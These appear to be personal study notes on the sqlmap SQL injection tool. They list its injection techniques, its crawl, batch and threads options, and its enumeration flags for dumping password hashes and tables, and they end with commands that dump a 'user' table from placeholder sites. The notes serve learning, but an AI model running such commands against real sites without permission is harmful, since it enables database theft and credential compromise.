1. B : boolean-based bind
2. E : error-based
3. U : union besed
4. S: stacked queries
5. T: time based
6. Q : inline queries

Crawl - 1 , 2, 3

1 for : <https://abc.com/data>

2 for : <https://abc.com/data>/today

3 for : <https://abc.com/data>/today/news

Sqlmap --url <https://test.com> --crawl 2 --batch -threads 3

--crawl -> crawl website till 2nd page

--batch --> take by default answers

--risk -> 1 , 2,3

--threads --> How many request to send one time

Enumeration commands:

1. -a --> retive everything
2. -b --> retrieve DBMS banner
3. --current-user --> dmns current user
4. --current-db --> current database
5. --passwords --> enumerate dbms user password hases
6. --dbs --> dbms database
7. --tables --> dbms database tables
8. --columns --> dbms columns
9. --dump --> dbms database table entries
10. --dump-all --> dbms databased tables entries

Sqlmap --url <https://abc.com> --crawl 2 --batch -D acuart --tables

Sqlmap --url <https://abc.com> --crawl 2 --batch -D acuart -T user --dump